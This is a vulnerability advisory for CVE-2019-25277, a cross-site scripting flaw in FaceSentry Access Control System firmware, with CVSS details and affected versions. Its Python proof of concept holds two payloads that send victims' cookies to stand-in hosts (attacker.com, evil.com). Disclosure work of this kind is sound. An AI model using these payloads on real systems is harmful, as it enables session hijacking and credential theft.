Security Vulnerability Report
CVE-2019-25277 CVSS 6.1 MEDIUM

Published: 2026-01-08 00:15:58
Last Modified: 2026-01-22 13:47:52

Description

FaceSentry Access Control System 6.4.8 contains a cross-site scripting vulnerability in the 'msg' parameter of pluginInstall.php that allows attackers to inject malicious scripts. Attackers can exploit the unvalidated input to execute arbitrary JavaScript in victim browsers, potentially stealing authentication credentials and conducting phishing attacks.

CVSS Details

CVSS 3.1 Score: 6.1
Severity: MEDIUM
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N (exploitability 2.8, impact 2.7)
CVSS 4.0 Score (secondary): 5.1 MEDIUM
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Weakness: CWE-79 (Improper Neutralization of Input During Web Page Generation, 'Cross-site Scripting')

Configurations (Affected Products)

cpe:2.3:o:iwt:facesentry_access_control_system_firmware:5.7.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:iwt:facesentry_access_control_system_firmware:5.7.2:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:iwt:facesentry_access_control_system_firmware:6.4.8:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:iwt:facesentry_access_control_system:-:*:*:*:*:*:*:* - NOT VULNERABLE (hardware platform the firmware runs on; listed in the configuration's AND node, not flagged as vulnerable itself)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# CVE-2019-25277 PoC - FaceSentry XSS in pluginInstall.php
# Target: FaceSentry Access Control System 6.4.8
# Vulnerability: XSS in msg parameter of pluginInstall.php

target_url = "http://target.com/pluginInstall.php"

# XSS payload to steal cookies
xss_payload = "<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>"

# Construct malicious request
params = {
    'msg': xss_payload,
    'install': '1'
}

try:
    response = requests.get(target_url, params=params, timeout=10)
    print(f"[*] Request sent to {target_url}")
    print(f"[*] Payload: {xss_payload}")
    # Note: a 200 status only shows the request was accepted; whether the
    # payload is actually reflected must be confirmed in response.text.
    if response.status_code == 200:
        print("[+] PoC executed - XSS payload injected")
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")

# Alternative payload - cookie theft via image tag
# (inner single quotes escaped so the string parses as valid Python)
alt_payload = '<img src=x onerror="this.src=\'https://evil.com/log?c=\'+document.cookie">'
```

References

https://cxsecurity.com/issue/WLB-2019070017 (Third Party Advisory)
https://exchange.xforce.ibmcloud.com/vulnerabilities/163191 (Third Party Advisory)
https://packetstormsecurity.com/files/153494 (Third Party Advisory)
https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5527.php (Exploit, Third Party Advisory)